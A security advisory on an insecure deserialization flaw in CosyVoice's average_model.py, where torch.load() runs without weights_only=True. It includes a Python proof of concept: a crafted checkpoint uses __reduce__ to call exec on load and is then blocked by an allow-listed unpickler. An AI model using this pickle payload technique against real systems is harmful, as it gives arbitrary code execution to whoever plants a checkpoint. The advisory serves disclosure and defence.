CosyVoice Insecure Deserialization Vulnerability in Model Averaging Tool Allowing Arbitrary Code Execution
Vulnerability
An insecure deserialization vulnerability exists in CosyVoice, in the average_model.py script used for model averaging. The script loads PyTorch checkpoint files (epoch_*.pt) with torch.load() without passing weights_only=True. torch.load() is built on Python's pickle module, and a pickle stream can name any importable callable together with the arguments to invoke it with, so an unrestricted load runs attacker-chosen code as a side effect of deserialization (the weights_only default only changed to True in PyTorch 2.6; older installations load everything). An attacker who can place a crafted checkpoint in the directory being averaged, for example a checkpoint obtained from an untrusted source, gets arbitrary code execution with the privileges of the user running the averaging tool as soon as that file is loaded.
Impact
Successful exploitation gives the attacker arbitrary code execution on the system running the model averaging tool, with the privileges of the user who invoked it.
Reproduction
To reproduce this vulnerability, check out a version of CosyVoice that contains the vulnerable commit. Create a directory and place in it a crafted PyTorch checkpoint file, named to match the epoch_*.pt pattern the script loads, whose pickle stream invokes a callable of the attacker's choice. Run the model averaging tool in average_model.py against that directory. When the script calls torch.load() on the crafted file, the embedded payload executes before any averaging takes place.
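As an added example (not CosyVoice code, and not how average_model.py is written), the following script shows the mechanism behind the vulnerability and the reproduction above: it writes a crafted epoch_*.pt into a directory, loads it the way an unrestricted torch.load() would, and then loads it through an allow-listed unpickler of the kind weights_only=True installs. Plain pickle stands in for torch.load() so the demo runs without PyTorch installed; torch.load() delegates to the same pickle machinery. The file names, function names and allowlist contents are this example's own assumptions.

```python
"""Added example, not CosyVoice's code: why an unrestricted pickle-based
checkpoint load is code execution, and what an allow-listed loader (the idea
behind torch.load(..., weights_only=True)) does instead.  Plain pickle stands
in for torch.load() so this runs without PyTorch; file names, function names
and the allowlist are this example's own assumptions."""
import collections
import os
import pickle
import tempfile


class MaliciousCheckpoint:
    """Hostile object.  pickle serialises the tuple __reduce__ returns, which
    means 'call builtins.exec(code) on load'; the unpickler performs that call
    and its return value becomes the 'deserialised object'."""

    def __init__(self, code):
        self.code = code

    def __reduce__(self):
        return (exec, (self.code,))


def write_malicious_checkpoint(ckpt_dir, marker_path):
    """Drop an epoch_*.pt whose payload creates marker_path when loaded."""
    path = os.path.join(ckpt_dir, "epoch_1.pt")
    # The marker file is the visible proof that attacker code ran; a real
    # payload would run anything the averaging user can run.
    code = f"with open({marker_path!r}, 'w') as f: f.write('pwned')"
    with open(path, "wb") as f:
        pickle.dump(MaliciousCheckpoint(code), f)
    return path


def write_benign_checkpoint(ckpt_dir):
    """A legitimate state_dict-like object: an OrderedDict of parameter lists
    (constructed sample data)."""
    path = os.path.join(ckpt_dir, "epoch_2.pt")
    state = collections.OrderedDict(
        [("encoder.weight", [0.5, -0.25]), ("encoder.bias", [0.0])]
    )
    with open(path, "wb") as f:
        pickle.dump(state, f)
    return path


def unsafe_load(path):
    """What torch.load(path) does with weights_only=False (the default before
    PyTorch 2.6): every global named in the stream is imported and may be
    called."""
    with open(path, "rb") as f:
        return pickle.load(f)


# Only the (module, name) pairs this example's state_dict needs.  torch's
# weights_only unpickler applies the same rule with a PyTorch-specific list
# (tensor rebuild helpers, storage classes, OrderedDict, ...).
SAFE_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is the only way a pickle stream reaches Python code; refusing
    everything outside the allowlist turns exec, os.system, subprocess.Popen
    and friends into an UnpicklingError instead of a call."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"checkpoint references forbidden global {module}.{name}"
        )


def safe_load(path):
    with open(path, "rb") as f:
        return RestrictedUnpickler(f).load()


def demo():
    """Return (payload ran under unsafe_load, payload rejected by safe_load,
    benign checkpoint as loaded by safe_load)."""
    with tempfile.TemporaryDirectory() as ckpt_dir:
        marker = os.path.join(ckpt_dir, "pwned.txt")
        bad = write_malicious_checkpoint(ckpt_dir, marker)
        good = write_benign_checkpoint(ckpt_dir)

        unsafe_load(bad)                      # executes the embedded code
        executed = os.path.exists(marker)

        try:
            safe_load(bad)
            rejected = False
        except pickle.UnpicklingError:
            rejected = True

        return executed, rejected, safe_load(good)


if __name__ == "__main__":
    ran, blocked, weights = demo()
    print("unsafe load executed payload:", ran)          # True
    print("restricted load rejected payload:", blocked)  # True
    print("restricted load of real checkpoint:", dict(weights))
```

In average_model.py the corresponding fix is to call torch.load(path, weights_only=True), whose built-in allowlist covers the tensor rebuild helpers and storage types a real state_dict contains; the restricted unpickler above is the same idea reduced to what a dictionary of Python lists needs. weights_only only constrains deserialization, so a hostile checkpoint can still carry wrong or oversized tensors; checkpoints from untrusted sources should also be checked against a known hash or signature before they are averaged.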
